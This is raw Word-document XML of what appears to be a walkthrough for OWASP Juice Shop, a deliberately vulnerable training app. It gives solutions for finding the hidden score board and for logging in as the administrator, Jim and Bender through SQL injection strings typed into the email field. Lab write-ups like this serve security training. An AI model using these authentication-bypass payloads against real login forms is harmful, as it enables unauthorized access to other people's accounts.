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spwa3hk0zkrl" w:id="0"/>
      <w:bookmarkEnd w:id="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1. "Find the carefully hidden 'Score Board' page."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ageBreakBefore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qni7qbsww7qb" w:id="1"/>
      <w:bookmarkEnd w:id="1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Solution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scoreboard can be found at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http://ip:port/#/score-board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ageBreakBefore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m8gqhkf9hqai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2. "Provoke an error that is not very gracefully handled."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ageBreakBefore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ksdco7fjfguz" w:id="3"/>
      <w:bookmarkEnd w:id="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Solution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When logging on as email, simply use: '.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xxspbhuadshe" w:id="4"/>
      <w:bookmarkEnd w:id="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3: "Log in with the administrator's user account."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ageBreakBefore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p40hpj82mpa0" w:id="5"/>
      <w:bookmarkEnd w:id="5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Solution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When logging on as email use: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032f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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1;--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uy2e0ckmf3l9" w:id="6"/>
      <w:bookmarkEnd w:id="6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4: "Log in with Jim's user account."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ageBreakBefore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q4wq8bjjd8ah" w:id="7"/>
      <w:bookmarkEnd w:id="7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Solution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When logging on as email use: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032f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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 and email not like('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%admin%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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">');--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ageBreakBefore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xbwgzgq82yc7" w:id="8"/>
      <w:bookmarkEnd w:id="8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5: "Log in with Bender's user account."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ageBreakBefore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88fux6vgy22b" w:id="9"/>
      <w:bookmarkEnd w:id="9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Solution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When logging on as email use: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240" w:line="348" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="032f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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 and email like('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%bender%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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">');--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240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="032f6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https://github.com/bsqrl/juice-shop-walkthrough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https://incognitjoe.github.io/hacking-the-juice-shop.html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s://github.com/bsqrl/juice-shop-walkthrough" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://incognitjoe.github.io/hacking-the-juice-sh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